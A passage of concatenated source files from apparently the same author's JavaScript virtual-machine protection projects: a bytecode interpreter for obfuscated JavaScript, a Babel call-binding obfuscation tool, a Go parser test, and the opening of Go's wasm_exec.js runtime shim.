a2 = duei.pop()
a1 = a2 >= a1;
duei.push(a1)
break
case 38:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 > a1;
duei.push(a1)
break
case 39:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 == a1;
duei.push(a1)
break
case 48:
a1 = shuz[start++] * 2
a3 = []
a4 = []
for (a2=0; a2< a1;a2++){
if (a2 < a1/2){
a3.splice(0,0,duei.pop())
}else{
a4.splice(0,0,duei.pop())
}
}
a1 = duei.pop()
for (a2=0; a2 < a3.length; a2++){
if (a4[a2] == a1){
start += a3[a2]
break
}
else if (a4[a2] == null){
start += a3[a2]
break
}
}
break
case 53:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 === a1;
duei.push(a1)
break
case 54:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 !== a1;
duei.push(a1)
break
case 550:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 != a1;
duei.push(a1)
break
case 551:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 in a1;
duei.push(a1)
break
case 22:
a1 = shuz[start++]
a2 = duei.pop()
a3 = duei.pop()
a2[constantPool[a1]] = a3
break
case 19:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 - a1;
duei.push(a1)
break
case 291:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 - a1;
duei.push(a1)
break
case 20:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 + a1;
duei.push(a1)
break
case 24:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 < a1;
duei.push(a1)
break
case 240:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 < a1;
duei.push(a1)
break
case 27:
a1 = duei.pop()
a2 = duei.pop()
a1 = a1 * a2;
duei.push(a1)
break
case 28:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 % a1;
duei.push(a1)
break
case 29:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 ^ a1;
duei.push(a1)
break
case 30:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 / a1;
duei.push(a1)
break
case 194:
debugger;
break
case 25:
a1 = duei.pop()
a2 = shuz[start++]
if (!a1) {
start += a2;
}
;break
case 31:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 << a1;
duei.push(a1)
break
case 32:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 | a1;
duei.push(a1)
break
case 26:
a1 = duei.pop()
// a2 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] += 1
break
case 190:
a1 = shuz[start++]
start += a1
break
case 192:
a1 = duei.pop()
a3 = shuz[start++]
if (a1) {
start += a3
}
break
case 33:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 >> a1;
duei.push(a1)
break
case 34:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 >>> a1;
duei.push(a1)
break
case 52:
a1 = duei.pop()
// a2 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] -= 1
break
case 104:
duei.push({})
break
case 105:
duei.push([])
break
case 57:
i = []
a3 = shuz[start++]
a2 = duei.pop()
for (a1 in a2){
i.push(a1)
}
cbbb['for_in_xh_cbb_list'+a3] = i
break
case 51:
a1 = duei.pop()
a2 = shuz[start++]
if (!a1) {
start += a2;
duei.push(a1)
}
;break
case 252:
a1 = duei.pop()
a2 = shuz[start++]
if (a1) {
start += a2;
duei.push(a1)
}
;break
case 195:
a2 = shuz[start++]
a3 = shuz[start++]
a4 = shuz[start++]
try{
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
start = a2+start;
if (a6 == "-90_cbb"){
return a6
}
}catch(e){
a7 = e
start = a2+start;
a6 = cbb_jsvmp(a1, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"args":args,
"argsList":argsList,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}
}finally{
if (a6 == "-90_cbb"){
return a6
}
start = a3+start;
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}
start =start+ a4
}
break
case 35:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 & a1;
duei.push(a1)
break
case 8:
a1 = shuz[start++]
a2 = shuz[start++]
a1 = new RegExp( constantPool[a1], constantPool[a2]) ;
duei.push(a1)
break
case 10:
a1 = shuz[start++]
duei.push(constantPool[a1])
break
case 11:
a1 = shuz[start++]
duei.push(a1)
break
case 58:
a1 = duei.pop()
throw a1
break
case 40:
a1 = duei.pop()
a2 = duei.pop()
a2.push(a1);
duei.push(a2)
break
case 1:
a8 = duei.length
for (a1=0; a1< a8; a1++){
a7 = duei.pop()
let g = a7
all[g] = function(){
let g2 = []
var huuuu = this
if (offnew == 1){
offnew=0
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
a9.__proto__ = cbbb
cltothis(a9.variablePool,changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
return huuuu
}else{
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
cltothis(a9['variablePool'],changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a9.__proto__ = cbbb
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
}
if (g2.length == 0){
return undefined
}else{
let h = g2.pop()
for (;1==1;){
if (g2.length == 0){
break
}else{
g2.pop()
}
}
return h
}
}
}
break
case 2:
a1 = duei.length
for (a2 = 0; a2 < a1; a2++){
a3 = duei.shift()
if (argsList[a2] != undefined ){
cbbb[a3] = argsList[a2];
}
}
break
case 90:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
// a3[a2] = a1;
// getproto(a3,a2,a1)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 290:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
// a3[a2] = a1;
// getproto(a2,a1,a3)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 44:
a5 = duei.pop()
duei.push(~a5)
break
case 49:
a5 = duei.pop()
duei.push(typeof a5)
break
case 50:
a5 = duei.pop()
duei.push(- a5)
break
case 45:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
// a3[a2] = a1;
// getproto(a3,a2,a1)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
duei.push(a3)
break
case 55:
a1 = duei.pop()
a2 = duei.pop()
a3 = delete a2[a1];
duei.push(a3)
break
case 56:
a5 = duei.pop()
duei.push(void a5)
break
case 60:
a5 = duei.pop()
duei.push(!a5)
break
case 197:
j = duei.pop()
j2 = duei.pop()
// j2[j] = a1
// getproto(j2,j,a1)
if (j2.variablePool != undefined){
getproto(j2,j,a7)
}else{
j2[j] = a1
}
break
case 46:
a1 = shuz[start++]
a3 = duei.pop()
args = []
for (a2=0; a2<a1; a2++ ){
args.splice(0,0,duei.pop())
}
offnew = 1
// if (a3 == RegExp){
//
// a4 = new RegExp(args[0], args[1])
//
//
// }else{
// a4 = new a3(...args)
//
// }
a4 = new a3(...args)
offnew = 0
duei.push(a4)
break
case 150:
a1 = shuz[start++]
a3 = duei.pop()
args = []
for (a2=0; a2<a1; a2++ ){
args.splice(0,0,duei.pop())
}
let found = false;
for (let key of Object.getOwnPropertyNames(window)) {
if (typeof window[key] === 'function' && a3 === window[key]) {
a4 = window[key](...args)
found = true;
break;
}
}
if (!found) {
a4 = a3.apply(all, args)
}
duei.push(a4)
break
case 181:
a1 = duei.pop();
a2 = duei.pop();
try{
a1 = a2[a1]
}catch(e){
a1 = window[a1]
}
// if (a2 == window && a1==undefined){
// throw new Error("")
// }
all = a2
duei.push(a1)
break
case 1810:
a1 = duei.pop();
break
case 1811:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 instanceof a1;
duei.push(a1)
break
case 200:
return
default:
return "-90_cbb"
}
}
}
if (!this.window){var window = {"exports": exports,"require": require,"module":module,"__dirname":__dirname,"__filename":__filename};window.__proto__=global;};
offnew = 0
window['variablePool'] = {}
window['zhili'] = []
cltothis(window['variablePool'],changlc.awcbb_yhh_fun0.variablePool)
cltothis(window['zhili'], changlc.awcbb_yhh_fun0.zhili)
cbb_jsvmp( window, [], 0, changlc.awcbb_yhh_fun0.zhili) |
2833844911/cy_jsvmp | 4,754 | tool/bindfun.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
function tiancHans(data){
var code = `
function banhhans(){
for (let i = 0; i < zzhans.length; i++){
if (zzhans[i] == 1) {
zzhans[i] = duei.cf.bind(duei).call.bind(duei.cf.bind(duei), duei.cf.bind(duei))
} else {
if (zzhans[i] == 2){
zzhans[i] = duei.sf.bind(duei).call.bind(duei.sf.bind(duei), duei.sf.bind(duei))
}else{
if (zzhans[i] == 3){
zzhans[i] = duei.Cf.bind(duei).call.bind(duei.Cf.bind(duei), duei.Cf.bind(duei))
}else{
zzhans[i] = duei.cF.bind(duei).call.bind(duei.cF.bind(duei), duei.cF.bind(duei))
}
}
};
}
}
banhhans();
`
var datame = []
var kswz = "";
var ffff = 0
var fg;
var ggggj = []
var parseHj = {
VariableDeclaration(path){
if (path.node.declarations[0].id.name.indexOf("cbb0") === -1 ){
return
}
if (kswz === ""){
kswz = path.node.declarations[0].id.name
}
var y = path.node.declarations[0].init.callee.object.object.callee.object.property.name
var yu;
switch (y){
case "cf":
yu = 1;
break
case "sf":
yu = 2
break
case "Cf":
yu = 3
break
case "cF":
yu = Math.ceil(3 +Math.random() * 10 +0.1)
break
default:
break
}
datame.push(yu)
ggggj.push(tee.variableDeclarator(tee.identifier(path.node.declarations[0].id.name), tee.memberExpression(
tee.identifier("zzhans"), tee.NumericLiteral(datame.length-1), true, false
)))
if (ffff === 0){
fg = path
ffff = 1
path.skip()
}else {
path.remove();
}
}
}
let ast = parser.parse(data)
traverse(ast, parseHj)
var f = tee.variableDeclaration("var",ggggj)
fg.replaceInline(f)
data = generator(ast).code;
code = "var zzhans = "+ JSON.stringify(datame)+";\n"+code;
data = data.replace("var "+ kswz, code+";var "+ kswz)
return data
}
function bindfun(data){
function RandDataArray(data) {
//混乱准备
var dataTemp = [].concat(data);
var dataBuffer = [];
var length = dataTemp.length;
//混乱数据
var randCount = 0;
var position = 0;
do {
var randvalue = (((length - randCount) - 1) + 1);
position = Math.floor(Math.random() * randvalue);
dataBuffer.push(dataTemp[position]);
randCount++;
dataTemp[position] = dataTemp[length - randCount];
} while (randCount < length);
return dataBuffer;
}
var needth = []
let ast = parser.parse(data)
let parseHj = {
CallExpression(path){
if (path.node.callee.name !== "CbbCs"){
return
}
var needBand = path.scope.getBinding(path.node.arguments[0].name);
var czsj = []
for (let i = 0; i < path.node.arguments[1].elements.length; i++){
czsj.push(generator(path.node.arguments[1].elements[i]).code)
}
var jiaf = []
var fname = 0;
for (let i =0; i < needBand.referencePaths.length; i++){
if (czsj.indexOf(needBand.referencePaths[i].parentPath+ '') !== -1){
var data = `${"var cbb000000"+ fname} = ${needBand.referencePaths[i].parentPath+ ''}.bind(${needBand.referencePaths[i]+ ''}).call.bind(${needBand.referencePaths[i].parentPath+ ''}.bind(${needBand.referencePaths[i] + ''}), ${needBand.referencePaths[i].parentPath+ ''}.bind(${needBand.referencePaths[i] + ''}));`
jiaf.push( data);
needBand.referencePaths[i].parentPath.replaceWithSourceString("cbb000000"+ fname)
fname += 1;
}
}
jiaf = RandDataArray(jiaf)
needth.push([path+"", jiaf.join('')])
path.skip()
}
}
traverse(ast, parseHj)
var d = generator(ast).code;
for (let i = 0; i< needth.length; i++){
d = d.replace(needth[i][0], needth[i][1])
}
d = tiancHans(d)
return d
}
exports.bindfun = bindfun;
|
2833844911/cy_jsvmp | 22,755 | tool/jsvmp_out_pro.js | var baoChen = []
function cltothis(cythis, poolList,off){
for (let i in poolList){
if (off == 1){
cythis[i] = undefined
}else{
cythis[i] = poolList[i];
}
}
}
window._fetch = window.fetch
function cbb_jsvmp(all, duei, start, shuz, argsList, ogg, op) {
var cbb_xc = []
function getproto(s,d,e){
let dt = s;
for ( ;1==1;){
if (s.hasOwnProperty(d)){
try{
s[d] = e
}catch(e2){
window[d] = e
return
}
break
}else{
s = s.__proto__
if (s == undefined || s==null){
window[d] = e
return
}
}
}
}
if (op !==undefined){
var allthis
allthis = op['allthis']
duei = op.duei
all = op.all
shuz = op.shuz
argsList = op.argsList
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2,i,a10 ;
a7 = op.a7
var args = op.args
var cbbb = op.cbbb;
}else{
var allthis
if (ogg !== undefined){
allthis = ogg
}else{
allthis = all
}
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2, i,a10;
var args = []
var cbbb = all;
}
var jsq = 0,og = 0,lp= 0;
while (!![]) {
if (cbb_xc.length !== 0 && og == 1){
if (lp === 0){
jsq += 1
}
if (jsq === 10){
a10 = []
a10.push(a1)
a10.push(a2)
a10.push(a3)
a10.push(a4)
a10.push(a5)
a10.push(a6)
a10.push(a7)
a10.push(a8)
a10.push(a9)
a10.push(duei)
a10.push(start)
a10.push(cbbb)
cbb_xc.splice(0,0, a10)
a10 = cbb_xc.pop()
a1 = a10[0]
a2 = a10[1]
a3 = a10[2]
a4 = a10[3]
a5 = a10[4]
a6 = a10[5]
a7 = a10[6]
a8 = a10[7]
a9 = a10[8]
duei = a10[9]
start = a10[10]
cbbb = a10[11]
shuz = codeOfmyfun
jsq = 0
}
}
let s_cbb = shuz[start++];
switch(s_cbb){
case 23:
all = cbbb
duei.push(cbbb)
break
case 47:
duei.push(allthis)
break
case 36:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 <= a1;
duei.push(a1)
break
case 37:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 >= a1;
duei.push(a1)
break
case 38:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 > a1;
duei.push(a1)
break
case 39:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 == a1;
duei.push(a1)
break
case 48:
a1 = shuz[start++] * 2
a3 = []
a4 = []
for (a2=0; a2< a1;a2++){
if (a2 < a1/2){
a3.splice(0,0,duei.pop())
}else{
a4.splice(0,0,duei.pop())
}
}
a1 = duei.pop()
for (a2=0; a2 < a3.length; a2++){
if (a4[a2] == a1){
start += a3[a2]
break
}
else if (a4[a2] == null){
start += a3[a2]
break
}
}
break
case 53:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 === a1;
duei.push(a1)
break
case 54:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 !== a1;
duei.push(a1)
break
case 550:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 != a1;
duei.push(a1)
break
case 551:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 in a1;
duei.push(a1)
break
case 22:
a1 = shuz[start++]
a2 = duei.pop()
a3 = duei.pop()
a2[constantPool[a1]] = a3
break
case 19:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 - a1;
duei.push(a1)
break
case 291:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 - a1;
duei.push(a1)
break
case 20:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 + a1;
duei.push(a1)
break
case 24:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 < a1;
duei.push(a1)
break
case 240:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 < a1;
duei.push(a1)
break
case 27:
a1 = duei.pop()
a2 = duei.pop()
a1 = a1 * a2;
duei.push(a1)
break
case 28:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 % a1;
duei.push(a1)
break
case 29:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 ^ a1;
duei.push(a1)
break
case 30:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 / a1;
duei.push(a1)
break
case 194:
debugger;
break
case 25:
a1 = duei.pop()
a2 = shuz[start++]
if (!a1) {
start += a2;
}
;break
case 31:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 << a1;
duei.push(a1)
break
case 32:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 | a1;
duei.push(a1)
break
case 26:
a1 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] += 1
break
case 190:
a1 = shuz[start++]
start += a1
break
case 192:
a1 = duei.pop()
a3 = shuz[start++]
if (a1) {
start += a3
}
break
case 33:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 >> a1;
duei.push(a1)
break
case 34:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 >>> a1;
duei.push(a1)
break
case 52:
a1 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] -= 1
break
case 104:
duei.push({})
break
case 105:
duei.push([])
break
case 57:
i = []
a3 = shuz[start++]
a2 = duei.pop()
for (a1 in a2){
i.push(a1)
}
cbbb['for_in_xh_cbb_list'+a3] = i
break
case 51:
a1 = duei.pop()
a2 = shuz[start++]
if (!a1) {
start += a2;
duei.push(a1)
}
;break
case 252:
a1 = duei.pop()
a2 = shuz[start++]
if (a1) {
start += a2;
duei.push(a1)
}
;break
case 195:
a2 = shuz[start++]
a3 = shuz[start++]
a4 = shuz[start++]
try{
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
start = a2+start;
if (a6 == "-90_cbb"){
return a6
}
}catch(e){
a7 = e
start = a2+start;
a6 = cbb_jsvmp(a1, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"args":args,
"argsList":argsList,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}
}finally{
if (a6 == "-90_cbb"){
return a6
}
start = a3+start;
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}
start =start+ a4
}
break
case 35:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 & a1;
duei.push(a1)
break
case 8:
a1 = shuz[start++]
a2 = shuz[start++]
a1 = new RegExp( constantPool[a1], constantPool[a2]) ;
duei.push(a1)
break
case 10:
a1 = shuz[start++]
duei.push(constantPool[a1])
break
case 11:
a1 = shuz[start++]
duei.push(a1)
break
case 58:
a1 = duei.pop()
throw a1
break
case 40:
a1 = duei.pop()
a2 = duei.pop()
a2.push(a1);
duei.push(a2)
break
case 1:
a8 = duei.length
for (a1=0; a1< a8; a1++){
a7 = duei.pop()
if (a7 ==="cbbiyhh.online"){
break
}
let g = a7
if (changlc[cbbb.variablePool[g]].isfunmr){
a9 = {
"variablePool":{},
"fg":changlc[cbbb.variablePool[g]].af
}
a9.__proto__ = cbbb
cltothis(a9.variablePool,changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cbbb[g] = a9;
continue
}
cbbb[g] = function(){
let g2 = []
var huuuu = this
if (offnew == 1){
offnew=0
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
a9.__proto__ = cbbb
cltothis(a9.variablePool,changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
return huuuu;
}else{
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
cltothis(a9['variablePool'],changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a9.__proto__ = cbbb
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
}
if (g2.length == 0){
return undefined
}else{
let h = g2.pop()
for (;1==1;){
if (g2.length == 0){
break
}else{
g2.pop()
}
}
return h
}
}
}
break
case 2:
a1 = duei.length
for (a2 = 0; a2 < a1; a2++){
a3 = duei.shift()
if (argsList[a2] != undefined ){
cbbb[a3] = argsList[a2];
}
}
break
case 90:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 290:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 44:
a5 = duei.pop()
duei.push(~a5)
break
case 49:
a5 = duei.pop()
duei.push(typeof a5)
break
case 50:
a5 = duei.pop()
duei.push(- a5)
break
case 45:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
duei.push(a3)
break
case 55:
a1 = duei.pop()
a2 = duei.pop()
a3 = delete a2[a1];
duei.push(a3)
break
case 56:
a5 = duei.pop()
duei.push(void a5)
break
case 60:
a5 = duei.pop()
duei.push(!a5)
break
case 197:
j = duei.pop()
j2 = duei.pop()
if (j2.variablePool != undefined){
getproto(j2,j,a7)
}else{
j2[j] = a1
}
break
case 46:
a1 = shuz[start++]
a3 = duei.pop()
args = []
for (a2=0; a2<a1; a2++ ){
args.splice(0,0,duei.pop())
}
offnew = 1
if (a3 == RegExp) {
a4 = new RegExp(args[0], args[1])
} else {
a4 = new a3(...args)
}
offnew = 0
duei.push(a4)
break
case 150:
a1 = shuz[start++]
a3 = duei.pop()
args = []
for (a2=0; a2<a1; a2++ ){
args.splice(0,0,duei.pop())
}
let found = false;
for (let key of Object.getOwnPropertyNames(window)) {
if (typeof window[key] === 'function' && a3 === window[key]) {
a4 = window[key](...args)
found = true;
break;
}
}
if (!found) {
a4 = a3.apply(all, args)
}
duei.push(a4)
break
case 181:
a1 = duei.pop();
a2 = duei.pop();
try{
a1 = a2[a1]
}catch(e){
a1 = window[a1]
}
all = a2
duei.push(a1)
break
case 1810:
a1 = duei.pop();
break
case 1811:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 instanceof a1;
duei.push(a1)
break
case 1812:
a1 = {
"a1": shuz,
"a2": start,
"a3": duei,
"a4": cbbb
}
baoChen.push(a1)
break
case 1813:
a1 = duei.pop()
shuz = codeOfmyfun
start = a1['fg']
cbbb = a1
break
case 1814:
if (og === 1){
a10 = cbb_xc.pop()
if (!a10){
a1 = baoChen.pop()
shuz = a1.a1
start = a1.a2+1
duei = a1.a3
cbbb = a1.a4
og = 0
jsq = 0
}else {
a1 = a10[0]
a2 = a10[1]
a3 = a10[2]
a4 = a10[3]
a5 = a10[4]
a6 = a10[5]
a7 = a10[6]
a8 = a10[7]
a9 = a10[8]
duei = a10[9]
start = a10[10]
cbbb = a10[11]
shuz = codeOfmyfun
jsq = 0
}
break
}
a2 = duei.pop()
while (1){
a1 = duei.pop()
if (a1 === "cbbiyhh_dgggg_opopop"){
break
}
}
break
case 1815:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
if (a2.variablePool != undefined){
getproto(a2,a1,a3)
}else{
a2[a1] = a3
}
break
case 1816:
a1 = baoChen.pop()
shuz = a1.a1
start = a1.a2+1
cbbb = a1.a4
duei.push(a2)
break
case 1818:
a1 = []
while (1){
a2 = duei.pop()
if (a2 === "cbb_isokk_yhh_very_p"){
break
}
a1.push(a2)
}
duei.push(a1)
break
case 1819:
og = 1
a10 = cbb_xc.pop()
a1 = a10[0]
a2 = a10[1]
a3 = a10[2]
a4 = a10[3]
a5 = a10[4]
a6 = a10[5]
a7 = a10[6]
a8 = a10[7]
a9 = a10[8]
duei = a10[9]
start = a10[10]
cbbb = a10[11]
shuz = codeOfmyfun
jsq = 0
break
case 1820:
lp = 1
break
case 1821:
lp = 0
break
case 1817:
a10 = []
a10.push(a1)
a10.push(a2)
a10.push(a3)
a10.push(a4)
a10.push(a5)
a10.push(a6)
a10.push(a7)
a10.push(a8)
a10.push(a9)
a10.push(duei.pop())
a10.push(duei.pop())
a10.push(duei.pop())
cbb_xc.push(a10)
break
case 200:
return
default:
return "-90_cbb"
}
}
}
if (!this.window){var cywindow = {"exports": exports,"require": require,"module":module,"__dirname":__dirname,"__filename":__filename};cywindow.__proto__=global;window=global};
offnew = 0
cywindow['variablePool'] = {}
cywindow['zhili'] = []
cltothis(cywindow['variablePool'],changlc.awcbb_yhh_fun0.variablePool)
cltothis(cywindow['zhili'], changlc.awcbb_yhh_fun0.zhili)
cbb_jsvmp( cywindow, [], 0, changlc.awcbb_yhh_fun0.zhili)
|
2833844911/gojsvmp | 1,125 | parseToDt/parseToDt_test.go | package parseToDt
import (
"fmt"
"myvmp/ast"
"myvmp/evaluator"
"myvmp/lexer"
"myvmp/parse"
"myvmp/promise"
"testing"
)
func TestNextTokenee(t *testing.T) {
code := `
l = "dd";
var dd = (1 + "aaal" + 32) * 2 / 321 + "dsadas";
ff = 100 + dd + dd;
lp = ff == "ewewq";
var kpd = dd + "d" + lp + (90 + (80 >> 434)) * 3;
function dasddddIIeee(a, b) {
l = l + a + b;
this["ppp"] = function() {
l = 100 + "dsd" + 'ss';
}
;
this["lp"] = 100 + this.l;
}
;
var lppp = new dasddddIIeee(1,2);
lppp['ppp']();
try {
dasd = '{\'a\':"100",\"b\":{\'a\':100}}'
dd = JSON["parse"](dasd);
cyout("====", dd['b']['a']);
dd = JSON["stringify"](dd);
cyout("====", dd);
dd['l'] = this
dd = JSON["stringify"](dde);
} catch(a) {
cyout("==== 重新");
}
cyout("==== 结束 ====", dd);
`
promise.CyJSInit()
dt := lexer.New(code)
kk := (*dt).Input()
kpp := parse.New(kk)
fff := kpp.ParseAst()
dtt := &ast.Program{Body: fff}
dtt.StatementNode()
dd := PrushData(dtt)
fmt.Println(dd)
ss := LoadStr(dd)
dyy := ss.(*ast.Program)
evaluator.StartEval(dyy.Body)
promise.Done()
}
|
2833844911/gojsvmp | 16,687 | static/wasm_exec.js | // Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
"use strict";
(() => {
const enosys = () => {
const err = new Error("not implemented");
err.code = "ENOSYS";
return err;
};
if (!globalThis.fs) {
let outputBuf = "";
globalThis.fs = {
constants: { O_WRONLY: -1, O_RDWR: -1, O_CREAT: -1, O_TRUNC: -1, O_APPEND: -1, O_EXCL: -1 }, // unused
writeSync(fd, buf) {
outputBuf += decoder.decode(buf);
const nl = outputBuf.lastIndexOf("\n");
if (nl != -1) {
console.log(outputBuf.substring(0, nl));
outputBuf = outputBuf.substring(nl + 1);
}
return buf.length;
},
write(fd, buf, offset, length, position, callback) {
if (offset !== 0 || length !== buf.length || position !== null) {
callback(enosys());
return;
}
const n = this.writeSync(fd, buf);
callback(null, n);
},
chmod(path, mode, callback) { callback(enosys()); },
chown(path, uid, gid, callback) { callback(enosys()); },
close(fd, callback) { callback(enosys()); },
fchmod(fd, mode, callback) { callback(enosys()); },
fchown(fd, uid, gid, callback) { callback(enosys()); },
fstat(fd, callback) { callback(enosys()); },
fsync(fd, callback) { callback(null); },
ftruncate(fd, length, callback) { callback(enosys()); },
lchown(path, uid, gid, callback) { callback(enosys()); },
link(path, link, callback) { callback(enosys()); },
lstat(path, callback) { callback(enosys()); },
mkdir(path, perm, callback) { callback(enosys()); },
open(path, flags, mode, callback) { callback(enosys()); },
read(fd, buffer, offset, length, position, callback) { callback(enosys()); },
readdir(path, callback) { callback(enosys()); },
readlink(path, callback) { callback(enosys()); },
rename(from, to, callback) { callback(enosys()); },
rmdir(path, callback) { callback(enosys()); },
stat(path, callback) { callback(enosys()); },
symlink(path, link, callback) { callback(enosys()); },
truncate(path, length, callback) { callback(enosys()); },
unlink(path, callback) { callback(enosys()); },
utimes(path, atime, mtime, callback) { callback(enosys()); },
};
}
if (!globalThis.process) {
globalThis.process = {
getuid() { return -1; },
getgid() { return -1; },
geteuid() { return -1; },
getegid() { return -1; },
getgroups() { throw enosys(); },
pid: -1,
ppid: -1,
umask() { throw enosys(); },
cwd() { throw enosys(); },
chdir() { throw enosys(); },
}
}
if (!globalThis.crypto) {
throw new Error("globalThis.crypto is not available, polyfill required (crypto.getRandomValues only)");
}
if (!globalThis.performance) {
throw new Error("globalThis.performance is not available, polyfill required (performance.now only)");
}
if (!globalThis.TextEncoder) {
throw new Error("globalThis.TextEncoder is not available, polyfill required");
}
if (!globalThis.TextDecoder) {
throw new Error("globalThis.TextDecoder is not available, polyfill required");
}
const encoder = new TextEncoder("utf-8");
const decoder = new TextDecoder("utf-8");
globalThis.Go = class {
constructor() {
this.argv = ["js"];
this.env = {};
this.exit = (code) => {
if (code !== 0) {
console.warn("exit code:", code);
}
};
this._exitPromise = new Promise((resolve) => {
this._resolveExitPromise = resolve;
});
this._pendingEvent = null;
this._scheduledTimeouts = new Map();
this._nextCallbackTimeoutID = 1;
const setInt64 = (addr, v) => {
this.mem.setUint32(addr + 0, v, true);
this.mem.setUint32(addr + 4, Math.floor(v / 4294967296), true);
}
const setInt32 = (addr, v) => {
this.mem.setUint32(addr + 0, v, true);
}
